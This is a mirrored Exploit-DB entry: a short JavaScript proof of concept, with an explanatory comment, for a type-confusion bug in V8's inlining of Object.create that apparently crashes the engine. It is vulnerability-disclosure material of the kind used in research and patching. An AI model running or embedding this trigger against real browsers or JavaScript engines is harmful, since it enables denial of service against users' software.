bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/dos/44258.js
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

31 lines
No EOL
840 B
JavaScript
Raw Blame History

/*
I think this commit has introduced the bug.
https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2
According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".
The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
return NoChange();
}
instance_map = Map::GetObjectCreateMap(prototype_const);
PoC:
*/
var object;
function opt() {
opt['x'] = 1.1;
try {
Object.create(object);
} catch (e) {
}
for (let i = 0; i < 1000000; i++) {
}
}
opt();
object = opt;
opt();
Reference in a new issue View git blame Copy permalink